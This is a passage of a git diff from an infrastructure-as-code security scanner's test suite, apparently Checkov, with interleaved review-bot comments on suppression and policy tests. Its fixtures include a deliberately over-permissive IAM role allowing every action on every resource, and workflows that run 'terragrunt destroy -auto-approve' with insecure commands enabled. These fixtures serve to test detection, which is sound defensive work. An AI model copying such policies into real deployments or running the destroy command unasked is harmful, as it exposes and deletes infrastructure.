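      RoleArn: !GetAtt aws_iam_role4.Arn

  aws_iam_role4:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal:
              Service: sagemaker.amazonaws.com
            Action: sts:AssumeRole
      Policies:
        - PolicyName: all-traffic
          PolicyDocument:
            Version: '2012-10-17'
            Statement:
              - Effect: Allow
                Action: '*'
                Resource: '*'
```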
@@ -39,6 +39,9 @@ def test_MSKClusterLogging(self): def test_LambdaFunction(self): self.go("LambdaFunction") + def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self): + self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic") + def test_ALBRedirectHTTPtoHTTPS(self): self.go("ALBRedirectHTTPtoHTTPS") diff --git a/tests/common/integration_features/test_policy_metadata_integration.py b/tests/common/integration_features/test_policy_metadata_integration.py index d85f0ca2d8f..d584a941303 100644 --- a/tests/common/integration_features/test_policy_metadata_integration.py +++ b/tests/common/integration_features/test_policy_metadata_integration.py @@ -18,9 +18,10 @@ def test_filtered_policy_ids(self): metadata_integration.bc_integration = instance metadata_integration.pre_scan() metadata_integration.pc_to_ckv_id_mapping - self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53'}) + self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53', '1234': 'CKV3_SAST_123'}) self.assertListEqual(metadata_integration.filtered_policy_ids, ['CKV_AWS_212', '806079891421835264_AZR_1685557908904', 'CKV_AWS_40', 'CKV_AWS_53', 'CKV_AZURE_122']) self.assertListEqual(metadata_integration.filtered_exception_policy_ids, ['CKV_AWS_212']) + self.assertSetEqual(set(metadata_integration.sast_check_metadata.keys()), {'CKV3_SAST_123'}) def mock_customer_run_config(): 
@@ -89,6 +90,22 @@ def mock_customer_run_config():
 "3dc2478c-bf25-4383-aaa1-30feb5cda586"
 ],
 "benchmarks": {}
+ },
+ "CKV3_SAST_123": {
+ "id": "BC_SAST_123",
+ "title": "sast",
+ "guideline": "https://docs.bridgecrew.io/docs/abc",
+ "severity": "LOW",
+ "pcSeverity": "LOW",
+ "category": "Networking",
+ "checkovId": "CKV3_SAST_123",
+ "constructiveTitle": "sast",
+ "descriptiveTitle": "sast",
+ "pcPolicyId": "1234",
+ "additionalPcPolicyIds": [
+ "1234"
+ ],
+ "benchmarks": {}
 }
 },
 "customPolicies": [
diff --git a/tests/common/integration_features/test_suppressions_integration.py b/tests/common/integration_features/test_suppressions_integration.py
index c5c00cb994d..2bae612f052 100644
--- a/tests/common/integration_features/test_suppressions_integration.py
+++ b/tests/common/integration_features/test_suppressions_integration.py
@@ -226,6 +226,37 @@ def test_policy_suppression(self):
 self.assertTrue(suppressions_integration._check_suppression(record1, suppression))
 self.assertFalse(suppressions_integration._check_suppression(record2, suppression))
+ def test_policy_v2_suppression(self):
+ instance = BcPlatformIntegration()
+
+ suppressions_integration = SuppressionsIntegration(instance)
+ suppressions_integration._init_repo_regex()
+
+ suppression = {
+ "ruleType": "policy",
+ "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"],
+ }
+
+ record1 = Record(check_id='CKV_AWS_79', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record2 = Record(check_id='CKV_AWS_80', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+
+ self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+ self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+ self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))
+
 def test_suppress_by_policy_BC_VUL_2(self):
 instance = BcPlatformIntegration()
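Review bot: test_policy_v2_suppression pins the in-list and not-in-list cases but not the malformed one, a `policy` rule whose `checkovPolicyIds` is empty or missing. A suppression that matches too broadly silently hides findings, so the intended semantics (presumably fail-closed, i.e. nothing suppressed) is worth asserting, e.g. `self.assertFalse(suppressions_integration._check_suppression_v2(record1, {"ruleType": "policy", "checkovPolicyIds": []}))`. The three `Record(...)` constructions here, and the ones in test_repo_v2_suppression, test_repo_v2_suppression_cli_repo and test_file_v2_suppression_cli_repo, differ only in `check_id`; a module-level helper such as `def _record(check_id): return Record(check_id=check_id, check_name=None, check_result=None, code_block=None, file_path=None, file_line_range=None, resource=None, evaluations=None, check_class=None, file_abs_path='.', entity_tags=None)` would shorten each new test by a dozen lines.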
@@ -818,6 +849,45 @@ def test_account_suppression(self):
 self.assertTrue(suppressions_integration._check_suppression(record1, suppression))
 self.assertFalse(suppressions_integration._check_suppression(record2, suppression))
+ def test_repo_v2_suppression(self):
+ instance = BcPlatformIntegration()
+ instance.repo_id = 'org/repo'
+ suppressions_integration = SuppressionsIntegration(instance)
+ suppressions_integration._init_repo_regex()
+ suppression = {
+ "ruleType": "repository",
+ "repositories": [
+ {"repositoryName": "org/repo"},
+ {"repositoryName": "not/valid"}
+ ],
+ "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"],
+ }
+
+ # this is actually almost the same as a policy check, except we care about the repo name in the integration
+ # record details do not matter, except policy ID
+ record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+
+ self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+ self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+ self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))
+
+ instance.repo_id = 'another/repo'
+ self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression))
+
 def test_account_suppression_cli_repo(self):
 instance = BcPlatformIntegration()
 instance.repo_id = 'org/repo'
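Review bot: `suppressions_integration._init_repo_regex()` is called once while `instance.repo_id` is 'org/repo', and the final assertion then flips `instance.repo_id` to 'another/repo' without re-initialising. If the pattern built by `_init_repo_regex` embeds the repo id (its body is not in this diff), that last `assertFalse` exercises a stale pattern and may pass for the wrong reason; either call `suppressions_integration._init_repo_regex()` again after the reassignment, or add a comment stating that `_check_suppression_v2` reads `repo_id` directly and the regex does not depend on it. The same pattern appears in test_repo_v2_suppression_cli_repo and test_file_v2_suppression_cli_repo.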
@@ -845,6 +915,45 @@ def test_account_suppression_cli_repo(self):
 self.assertTrue(suppressions_integration._check_suppression(record1, suppression))
 self.assertFalse(suppressions_integration._check_suppression(record2, suppression))
+ def test_repo_v2_suppression_cli_repo(self):
+ instance = BcPlatformIntegration()
+ instance.repo_id = 'org/repo'
+ suppressions_integration = SuppressionsIntegration(instance)
+ suppressions_integration._init_repo_regex()
+ suppression = {
+ "ruleType": "repository",
+ "repositories": [
+ {"repositoryName": "1234_org/repo"},
+ {"repositoryName": "1234_not/valid"}
+ ],
+ "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"],
+ }
+
+ # this is actually almost the same as a policy check, except we care about the repo name in the integration
+ # record details do not matter, except policy ID
+ record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+
+ self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+ self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+ self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))
+
+ instance.repo_id = 'another/repo'
+ self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression))
+
 def test_resource_suppression(self):
 instance = BcPlatformIntegration()
 instance.repo_id = 'org/repo'
@@ -1013,6 +1122,71 @@ def test_tag_suppression(self):
 self.assertFalse(suppressions_integration._check_suppression(record4, suppression))
 self.assertFalse(suppressions_integration._check_suppression(record5, suppression))
+ def test_file_v2_suppression_cli_repo(self):
+ instance = BcPlatformIntegration()
+ instance.repo_id = 'org/repo'
+ suppressions_integration = SuppressionsIntegration(instance)
+ suppressions_integration._init_repo_regex()
+ suppression = {
+ "ruleType": "file",
+ "files": [
+ {
+ "repositoryName": "1234_org/repo",
+ "filePath": "test/file.txt"
+ },
+ {
+ "repositoryName": "1234_org/repo2",
+ "filePath": "/test/file2.txt"
+ },
+ {
+ "repositoryName": "1234_not/valid",
+ "filePath": "/test/file3.txt"
+ }
+ ],
+ "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"],
+ }
+
+ # this is actually almost the same as a policy check, except we care about the repo name in the integration
+ # record details do not matter, except policy ID
+ record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record1.repo_file_path = '/test/file.txt'
+ record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record2.repo_file_path = 'test/file.txt' # should still match despite missing slash
+ record3 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record3.repo_file_path = '/test/file2.txt'
+ record4 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record4.repo_file_path = 'test/file.txt'
+
+ self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+ self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+ self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) # right file, wrong repo
+ self.assertFalse(suppressions_integration._check_suppression_v2(record4, suppression))
+
+ record1.repo_file_path = '/test/file2.txt'
+ record2.repo_file_path = 'test/file2.txt'
+ instance.repo_id = 'org/repo2' # now check the same thing but with a leading slash in the suppression file
+ self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+ self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+
+ instance.repo_id = 'another/repo'
+ self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression))
+
 def test_apply_suppressions_to_report(self):
 instance = BcPlatformIntegration()
@@ -1024,6 +1198,7 @@ def test_apply_suppressions_to_report(self):
 "policyId": "BC_AWS_GENERAL_31",
 "comment": "No justification comment provided.",
 "checkovPolicyId": "CKV_AWS_79",
+ "isV1": True
 }
 suppressions_integration.suppressions = {suppression['checkovPolicyId']: [suppression]}
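Review bot: test_file_v2_suppression_cli_repo shows the leading slash in `filePath` is normalised in both directions (`record2.repo_file_path = 'test/file.txt'` matches `"test/file.txt"`, and `'test/file2.txt'` matches `"/test/file2.txt"`), but no record checks that a path which merely ends with or contains the suppressed path is rejected. A file suppression that matched on suffix or substring would hide findings in unrelated files, so add a negative case such as a `CKV_AWS_18` record with `repo_file_path = '/other/test/file.txt'` and assert `_check_suppression_v2` returns False. The `# right file, wrong repo` comment on record3 is useful; a matching `# right file and repo, policy not in list` on record4 would make the fourth assertion as self-explanatory.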
@@ -1065,44 +1240,126 @@ def test_apply_suppressions_to_report(self):
 self.assertEqual(len(report.passed_checks), 1)
 self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2')
 self.assertEqual(len(report.skipped_checks), 2)
+ self.assertEqual(report.skipped_checks[0].check_result['suppress_comment'], "No justification comment provided.")
+
+ def test_apply_suppressions_to_report_with_v2(self):
+ instance = BcPlatformIntegration()
+
+ suppressions_integration = SuppressionsIntegration(instance)
+
+ suppression = {
+ "ruleType": "policy",
+ "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"],
+ "isV1": False,
+ "justificationComment": "comment"
+ }
+
+ suppressions_integration.suppressions_v2 = {id: [suppression] for id in suppression['checkovPolicyIds']}
+
+ record1 = Record(check_id='CKV_AWS_79', check_name=None,
+ check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']},
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record2 = Record(check_id='CKV_AWS_1', check_name=None,
+ check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']},
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record3 = Record(check_id='CKV_AWS_80', check_name=None,
+ check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']},
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+ record4 = Record(check_id='CKV_AWS_2', check_name=None,
+ check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']},
+ code_block=None, file_path=None,
+ file_line_range=None,
+ resource=None, evaluations=None,
+ check_class=None, file_abs_path='.', entity_tags=None)
+
+ report = Report('terraform')
+ report.add_record(record1)
+ report.add_record(record2)
+ report.add_record(record3)
+ report.add_record(record4)
+
+ suppressions_integration._apply_suppressions_to_report(report)
+ self.assertEqual(len(report.failed_checks), 1)
+ self.assertEqual(report.failed_checks[0].check_id, 'CKV_AWS_1')
+ self.assertEqual(len(report.passed_checks), 1)
+ self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2')
+ self.assertEqual(len(report.skipped_checks), 2)
+ self.assertEqual(report.skipped_checks[0].check_result['suppress_comment'], "comment")
 def test_get_policy_level_suppressions(self):
 instance = BcPlatformIntegration()
 suppressions_integration = SuppressionsIntegration(instance)
 suppressions_integration.suppressions = {
- 'CKV_AWS_252': [{'suppressionType': 'Policy', 'id': '404088ed-4251-41ac-8dc1-45264af0c461',
+ 'CKV_AWS_252': [{'suppressionType': 'Policy', "isV1": True, 'id': '404088ed-4251-41ac-8dc1-45264af0c461',
 'policyId': 'BC_AWS_GENERAL_175', 'creationDate': '2022-11-09T16:27:36.413Z', 'comment': 'Test2',
 'checkovPolicyId': 'CKV_AWS_252'}],
 'CKV_AWS_36': [
- {'suppressionType': 'Policy', 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11',
+ {'suppressionType': 'Policy', "isV1": True, 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11',
 'policyId': 'BC_AWS_LOGGING_2', 'creationDate': '2022-11-09T16:11:58.435Z', 'comment': 'Testing',
 'checkovPolicyId': 'CKV_AWS_36'}],
 'CKV_K8S_27': [
- {'suppressionType': 'Policy', 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26',
+ {'suppressionType': 'Policy', "isV1": True, 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26',
 'creationDate': '2022-12-08T08:00:04.561Z', 'comment': 'test checkov suppressions',
 'checkovPolicyId': 'CKV_K8S_27'}],
 'acme_AWS_1668010000289': [
- {'suppressionType': 'Resources', 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1',
+ {'suppressionType': 'Resources', "isV1": True, 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1',
 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.887Z', 'comment': 'Testing',
 'resources': [{'accountId': 'acme_cli_repo/testing-resources',
 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail9'}],
 'checkovPolicyId': 'acme_AWS_1668010000289'},
- {'suppressionType': 'Resources', 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267',
+ {'suppressionType': 'Resources', "isV1": True, 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267',
 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.951Z', 'comment': 'Testing',
 'resources': [{'accountId': 'acme_cli_repo/testing-resources',
 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail10'}],
 'checkovPolicyId': 'acme_AWS_1668010000289'},
- {'suppressionType': 'Resources', 'id': '86d88e69-5755-4e69-965b-f97fc26e784b',
+ {'suppressionType': 'Resources', "isV1": True, 'id': '86d88e69-5755-4e69-965b-f97fc26e784b',
 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.838Z', 'comment': 'Testing',
 'resources': [{'accountId': 'acme_cli_repo/testing-resources',
 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail8'}],
 'checkovPolicyId': 'acme_AWS_1668010000289'}]}
+ suppressions_integration.suppressions_v2 = {
+ "CKV3_SAST_1": [{
+ "ruleType": "policy",
+ "isV1": False,
+ "id": "1111",
+ "policyIds": ["BC_SAST_1", "BC_SAST_2"]
+ }],
+ "CKV3_SAST_2": [
+ {
+ "ruleType": "policy",
+ "isV1": False,
+ "id": "2222",
+ "policyIds": ["BC_SAST_3", "BC_SAST_2"]
+ },
+ {
+ "ruleType": "repository",
+ "isV1": False,
+ "id": "3333",
+ "policyIds": ["BC_SAST_1", "BC_SAST_3"]
+ }
+ ]
+ }
+
 expected_suppressions = ['404088ed-4251-41ac-8dc1-45264af0c461', 'b68013bc-2908-4c9a-969d-f1640d4aca11',
- '271c1a79-2333-4a12-bf7d-55ec78468b94']
+ '271c1a79-2333-4a12-bf7d-55ec78468b94', '1111', '2222']
 policy_level_suppressions = suppressions_integration.get_policy_level_suppressions()
 self.assertEqual(expected_suppressions, list(policy_level_suppressions.keys()))
+ self.assertEqual(policy_level_suppressions['404088ed-4251-41ac-8dc1-45264af0c461'], ['BC_AWS_GENERAL_175'])
+ self.assertEqual(policy_level_suppressions['b68013bc-2908-4c9a-969d-f1640d4aca11'], ['BC_AWS_LOGGING_2'])
+ self.assertEqual(policy_level_suppressions['271c1a79-2333-4a12-bf7d-55ec78468b94'], ['BC_K8S_26'])
+ self.assertEqual(policy_level_suppressions['1111'], ["BC_SAST_1", "BC_SAST_2"])
+ self.assertEqual(policy_level_suppressions['2222'], ["BC_SAST_3", "BC_SAST_2"])
 if __name__ == '__main__':
diff --git a/tests/common/output/test_sarif_report.py b/tests/common/output/test_sarif_report.py
index c93698f3a87..a8e83e6917a 100644
--- a/tests/common/output/test_sarif_report.py
+++ b/tests/common/output/test_sarif_report.py
@@ -398,7 +398,7 @@ def test_non_url_guideline_link(self):
 def get_sarif_schema() -> dict[str, Any]:
 file_name, headers = urllib.request.urlretrieve(
- "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Documents/CommitteeSpecifications/2.1.0/sarif-schema-2.1.0.json"
+ "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json"
 )
 with open(file_name, "r") as file:
 schema = json.load(file)
diff --git a/tests/common/utils/test_type_forcers.py b/tests/common/utils/test_type_forcers.py
index 7373d5a728b..8622417ba40 100644
--- a/tests/common/utils/test_type_forcers.py
+++ b/tests/common/utils/test_type_forcers.py
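Review bot: `{id: [suppression] for id in suppression['checkovPolicyIds']}` in test_apply_suppressions_to_report_with_v2 shadows the builtin `id` as the comprehension variable; `{policy_id: [suppression] for policy_id in suppression['checkovPolicyIds']}` reads the same and avoids the lint warning. The new `report.skipped_checks[0].check_result['suppress_comment']` assertions (here and the one added to test_apply_suppressions_to_report) rely on record1 being the first skipped check, i.e. on `Report.add_record` preserving insertion order through `_apply_suppressions_to_report`; if that is not a documented guarantee, assert on `{r.check_id: r.check_result['suppress_comment'] for r in report.skipped_checks}` instead so the test is order-independent. In test_get_policy_level_suppressions the `repository` rule '3333' is correctly kept out of `expected_suppressions`, but a one-line comment saying that only `ruleType == "policy"` entries count as policy-level would spare the next reader from working that out from the expected list.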
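Review bot: get_sarif_schema still downloads the schema at test time from a mutable branch (`main`) with `urllib.request.urlretrieve`, which is exactly what broke when the old `master` path moved and will break again on the next upstream reorganisation; it also means the SARIF output is validated against whatever that URL serves on the day, with no integrity check. Pinning the raw URL to a specific commit or tag, or better, vendoring the schema JSON next to the test and loading it from disk, makes the test deterministic and network-free. The function's body continues outside the hunk; the temporary file returned by `urlretrieve` is not visibly removed, and `open(file_name, "r")` should pass `encoding="utf-8"` rather than rely on the platform default for a UTF-8 JSON document.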
@@ -9,9 +9,14 @@ def test_convert_prisma_policy_filter_to_dict(self):
 self.assertDictEqual(convert_prisma_policy_filter_to_dict(''), {})
 self.assertDictEqual(convert_prisma_policy_filter_to_dict(None), {})
 self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1 = A, F2= B '), {'F1': 'A', 'F2': 'B'})
- self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A'})
+ self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A', 'F2': 'C'})
 self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B,C'), {'F1': 'A', 'F2': 'B'})
+ policy_string = 'policy.name=AWS S3 bucket ACL grants READ permission to everyone'
+ filter_string = convert_prisma_policy_filter_to_dict(policy_string)
+ self.assertDictEqual(filter_string, {'policy.name': 'AWS S3 bucket ACL grants READ permission to everyone'})
+
+
 if __name__ == '__main__':
 unittest.main()
diff --git a/tests/github_actions/image_referencer/__init__.py b/tests/github_actions/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/github_actions/image_referencer/conftest.py b/tests/github_actions/image_referencer/conftest.py
deleted file mode 100644
index 1357f974587..00000000000
--- a/tests/github_actions/image_referencer/conftest.py
+++ /dev/null
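Review bot: `filter_string` holds the dict returned by `convert_prisma_policy_filter_to_dict`, so the name is misleading; `filter_dict = convert_prisma_policy_filter_to_dict(policy_string)` with the matching `self.assertDictEqual(filter_dict, ...)` would read correctly. The changed expectation for `'F1=A,B,F2=C'` now drops the bare `B` token while the next line still drops the trailing `C` of `'F1=A,F2=B,C'`; a one-line comment above these two asserts, e.g. `# tokens without '=' are discarded; only key=value pairs survive`, would record that this asymmetry is the intended behaviour rather than an accident. The two added blank lines after the last assertion appear to come on top of the existing separation before `if __name__`, which pushes it past the two blank lines PEP 8 expects.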
@@ -1,522 +0,0 @@ -from __future__ import annotations -from typing import Any - -import pytest - - -@pytest.fixture -def workflow_with_images() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "destroy_cert": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "__startline__": 9, - "__endline__": 24 - }, - "__startline__": 1, - "__endline__": 24 - } - - -@pytest.fixture -def workflow_line_numbers_with_image() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' destroy_cert:\n'), - (10, ' runs-on: ubuntu-latest\n'), - (11, ' name: Name\n'), - (12, ' container: node:14.16\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n')] - - -@pytest.fixture -def workflow_without_images() -> dict[str, Any]: - 
return { - "on": "pull_request", - "name": "unsecure-worfklow", - "jobs": { - "unsecure-job": { - "name": "job2", - "runs-on": "ubuntu-latest", - "env": { - "ACTIONS_ALLOW_UNSECURE_COMMANDS": True, - "__startline__": 10, - "__endline__": 11 - }, - "steps": [ - { - "name": "unsecure-step2", - "run": "echo \"goo\"\n", - "__startline__": 12, - "__endline__": 15 - } - ], - "__startline__": 7, - "__endline__": 15 - }, - "secure-job": { - "name": "job3", - "runs-on": "ubuntu-latest", - "env": { - "ACTIONS_ALLOW_UNSECURE_COMMANDS": False, - "__startline__": 19, - "__endline__": 20 - }, - "run": "echo \"ok\"", - "__startline__": 16, - "__endline__": 21 - }, - "__startline__": 6, - "__endline__": 21 - }, - "__startline__": 1, - "__endline__": 21 - } - - -@pytest.fixture -def workflow_line_numbers_with_image_first() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' first_job:\n'), - (10, ' container: node:14.22\n'), - (11, ' name: Name\n'), - (12, ' book: wood\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n'), - (24, ' second_job:\n'), - (25, ' runs-on: ubuntu-latest\n'), - (26, ' name: Name\n'), - (27, ' container: node:14.16\n'), - (28, ' steps:\n'), - (29, ' - name: Checkout codebase\n'), - (30, ' uses: actions/checkout@v3\n'), - (31, ' - name: infrastructure\n'), - (32, ' working-directory: terraform\n'), - (33, ' shell: bash\n'), - (34, ' env:\n'), - (35, ' TF_INPUT: 0\n'), - (36, ' run: |\n'), - (37, ' terragrunt init\n'), - (38, ' terragrunt destroy -auto-approve -var-file 
devl.tfvars\n') - ] - - -@pytest.fixture -def workflow_line_numbers_with_two_identical_images() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' first_job:\n'), - (10, ' runs-on: ubuntu-latest\n'), - (11, ' name: Name\n'), - (12, ' container: node:14.16\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n'), - (24, ' second_job:\n'), - (25, ' runs-on: ubuntu-latest\n'), - (26, ' name: Name\n'), - (27, ' container: node:14.16\n'), - (28, ' steps:\n'), - (29, ' - name: Checkout codebase\n'), - (30, ' uses: actions/checkout@v3\n'), - (31, ' - name: infrastructure\n'), - (32, ' working-directory: terraform\n'), - (33, ' shell: bash\n'), - (34, ' env:\n'), - (35, ' TF_INPUT: 0\n'), - (36, ' run: |\n'), - (37, ' terragrunt init\n'), - (38, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n') - ] - - -@pytest.fixture -def workflow_with_image_first() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - 